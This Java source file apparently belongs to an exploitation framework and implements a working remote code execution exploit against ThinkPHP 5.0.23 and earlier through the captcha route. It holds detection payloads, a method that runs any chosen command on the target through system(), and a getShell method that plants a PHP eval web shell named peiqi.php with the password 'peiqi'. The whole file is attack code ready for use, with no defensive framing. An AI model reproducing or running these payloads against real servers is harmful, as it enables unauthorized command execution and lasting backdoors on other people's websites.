package exploit;

import com.github.kevinsawicki.http.HttpRequest;
import util.BasePayload;
import util.Result;

import java.util.ArrayList;

//ThinkPHP <= 5.0.23 需要存在xxx的method路由，例如captcha
public class tp5023 implements BasePayload {

    @Override
    public Result checkVUL(String url) throws Exception {
        String CheckStr = "PHP Version";

        String payload_url = url + "/?s=captcha&test=-1";
        ArrayList<String> payloads = new ArrayList<String>() {{
            add("_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1");
            add("_method=__ConStruct&method=get&filter[]=call_user_func&get[0]=phpinfo");
            add("_method=__construct&filter[]=phpinfo&method=GET&get[]=1");
        }};
        for (String payload : payloads) {
            try {
                HttpRequest req = HttpRequest.post(payload_url).send(payload);
                if (req.body().contains(CheckStr)) {
                    return new Result(true, "ThinkPHP 5.0.23 RCE", payload_url + " Post: " + payload);
                }
            } catch (Exception e) {
                e.printStackTrace();
            }
        }

        return new Result(false, "ThinkPHP 5.0.23 RCE", "");
    }

    public Result exeVUL(String url, String cmd) throws Exception {
        String payload_url = url + "/?s=captcha&test=-1";
        ArrayList<String> payloads = new ArrayList<String>() {{
            add("_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=" + cmd);
            add("s=" + cmd + "&_method=__construct&method=get&filter[]=system");
            add("s=" + cmd + "&_method=__construct&method&filter[]=system");
        }};
        for (String payload : payloads) {
            try {
                String response = HttpRequest.post(payload_url).send(payload).body();
                String res = response.substring(0, response.indexOf("<"));
                if (res.equals("")) {
                    return new Result(true, "", response);
                }
                return new Result(true, "", res);
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
        return new Result(false, null, null);
    }

    @Override
    public Result getShell(String url) throws Exception {
        String payload_url = url + "/?s=captcha&test=-1";
        ArrayList<String> payloads = new ArrayList<String>() {{
            add("_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo '<?php @eval($_POST['peiqi'])?>' >>peiqi.php");
            add("_method=__construct&filter[]=system&method=GET&get[]=echo '<?php @eval($_POST['peiqi'])?>' >>peiqi.php");
            add("_method=__construct&filter[]=assert&method=GET&get[]=file_put_contents('./peiqi.php','<?php%20@eval($_POST[%27peiqi%27])?>');");
            add("_method=__construct&filter[]=assert&method=GET&get[]=copy('<?php%20@eval($_POST[%27peiqi%27])?>', './peiqi.php');");
        }};

        for (int i = 0; i < payloads.size(); i++) {
            try {
                String res = HttpRequest.post(payload_url).send(payloads.get(i)).body();
                int code = HttpRequest.get(url + "/peiqi.php").code();
                if (code == 200) {
                    return new Result(true, null, url + "/peiqi.php   Pass:peiqi");
                }
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
        return new Result(false, null, null);
    }
}
